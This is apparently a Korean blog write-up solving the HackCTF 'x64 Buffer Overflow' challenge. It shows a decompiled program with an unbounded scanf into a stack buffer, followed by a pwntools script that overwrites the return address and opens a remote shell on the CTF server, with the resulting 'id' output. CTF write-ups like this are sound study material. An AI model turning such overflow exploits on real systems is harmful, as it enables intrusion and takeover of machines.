Phantom

HackCTF x64 Buffer Overflow 본문

Pwnable/HackCTF

HackCTF x64 Buffer Overflow

Ph4nt0m_ 2022. 9. 1. 17:01
반응형

x64 Buffer Overflow

Source

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[268]; // [rsp+10h] [rbp-110h]
  int v5; // [rsp+11Ch] [rbp-4h]

  _isoc99_scanf("%s", s, envp);
  v5 = strlen(s);
  printf("Hello %s\n", s);
  return 0;
}

Solve

from pwn import *

#context.log_level = 'DEBUG'

e = ELF("./64bof_basic")
#p = process("./64bof_basic")
r = remote("ctf.j0n9hyun.xyz", 3004)
offset = 280
pr_rdi = 0x400713
callMeMaybe = 0x400606

payload = ''
payload += "A"*offset
payload += p64(callMeMaybe)
payload += p64(pr_rdi)

r.sendline(payload)
r.interactive()
➜  hackctf python 64bof_basic.py 
[*] '/home/ubuntu/ctf/hackctf/64bof_basic'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to ctf.j0n9hyun.xyz on port 3004: Done
[*] Switching to interactive mode
$ id
uid=1000(attack) gid=1000(attack) groups=1000(attack)

Uploaded by Notion2Tistory v1.1.0

반응형

'Pwnable > HackCTF' 카테고리의 다른 글

HackCTF Offset  (0) 2022.09.01
HackCTF bof_pie  (0) 2022.09.01
HackCTF Simple_overflow_ver_2  (0) 2022.09.01
HackCTF x64 Simple_size_BOF  (0) 2022.09.01
HackCTF 내 버퍼가 흘러넘친다!!!  (0) 2022.09.01
'Pwnable/HackCTF' Related Articles more
Comments